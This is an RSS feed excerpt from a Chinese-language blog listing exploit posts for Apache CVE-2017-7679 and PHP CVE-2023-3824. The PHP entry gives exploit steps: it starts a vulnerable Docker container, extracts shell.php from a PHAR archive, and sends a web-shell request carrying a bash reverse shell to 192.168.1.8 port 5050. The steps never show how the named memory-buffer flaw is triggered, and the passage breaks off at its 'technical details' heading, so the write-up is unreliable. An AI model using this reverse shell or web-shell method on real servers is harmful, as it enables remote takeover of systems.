内存缓冲区 on 办公AI智能小助手 https://blog.qife122.com/tags/%E5%86%85%E5%AD%98%E7%BC%93%E5%86%B2%E5%8C%BA/ Recent content in 内存缓冲区 on 办公AI智能小助手 Hugo zh-cn qife Sun, 02 Nov 2025 17:58:33 +0800 Apache Http_Server内存缓冲区操作限制不当漏洞利用分析(CVE-2017-7679) https://blog.qife122.com/p/apache-http_server%E5%86%85%E5%AD%98%E7%BC%93%E5%86%B2%E5%8C%BA%E6%93%8D%E4%BD%9C%E9%99%90%E5%88%B6%E4%B8%8D%E5%BD%93%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90cve-2017-7679/ Sun, 02 Nov 2025 17:58:33 +0800 https://blog.qife122.com/p/apache-http_server%E5%86%85%E5%AD%98%E7%BC%93%E5%86%B2%E5%8C%BA%E6%93%8D%E4%BD%9C%E9%99%90%E5%88%B6%E4%B8%8D%E5%BD%93%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90cve-2017-7679/ <h1 id="-apache-http_server内存缓冲区操作限制不当漏洞利用cve-2017-7679">💀 Apache Http_Server内存缓冲区操作限制不当漏洞利用(CVE-2017-7679)</h1> <h2 id="漏洞信息">漏洞信息</h2> <p><strong>CVE-2017-7679 POC脚本</strong> | Lord0x | LordWare</p> <p><strong>CVSS评分</strong>: 9.8 <strong>发布日期</strong>: 2025-10-21</p> <h2 id="技术标签">技术标签</h2> <p>#LordWare #CVE<br> #CyberSec</p> PHP内存缓冲区操作限制不当漏洞利用分析(CVE-2023-3824) https://blog.qife122.com/p/php%E5%86%85%E5%AD%98%E7%BC%93%E5%86%B2%E5%8C%BA%E6%93%8D%E4%BD%9C%E9%99%90%E5%88%B6%E4%B8%8D%E5%BD%93%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90cve-2023-3824/ Wed, 08 Oct 2025 09:50:09 +0800 https://blog.qife122.com/p/php%E5%86%85%E5%AD%98%E7%BC%93%E5%86%B2%E5%8C%BA%E6%93%8D%E4%BD%9C%E9%99%90%E5%88%B6%E4%B8%8D%E5%BD%93%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90cve-2023-3824/ <h2 id="exploit-for-improper-restriction-of-operations-within-the-bounds-of-a-memory-buffer-in-php-cve-2023-3824">Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in PHP CVE-2023-3824</h2> <p>2025-09-23 | CVSS 9.8</p> <h3 id="漏洞利用步骤">漏洞利用步骤</h3> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo docker run -it --rm -p 8080:80 php:8.0.29-apache bash </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;phar.readonly = Off&#34;</span> &gt;&gt; /usr/local/etc/php/php.ini </span></span></code></pre></td></tr></table> </div> </div><h3 id="利用代码">利用代码</h3> <p>远程命令执行:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">http://localhost:8080/shell.php?cmd=bash -c &#39;bash -i &gt;%26 /dev/tcp/192.168.1.8/5050 0&gt;%261&#39; </span></span></code></pre></td></tr></table> </div> </div><p>PHAR文件提取:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="nx">php</span> <span class="o">-</span><span class="nx">r</span> <span class="s2">&#34;</span><span class="se">\$</span><span class="s2">phar = new Phar(&#39;exploit.phar&#39;); </span><span class="se">\$</span><span class="s2">phar-&gt;extractTo(&#39;./&#39;, &#39;shell.php&#39;);&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="技术细节">技术细节</h3> <p>该漏洞利用涉及以下关键技术点:</p>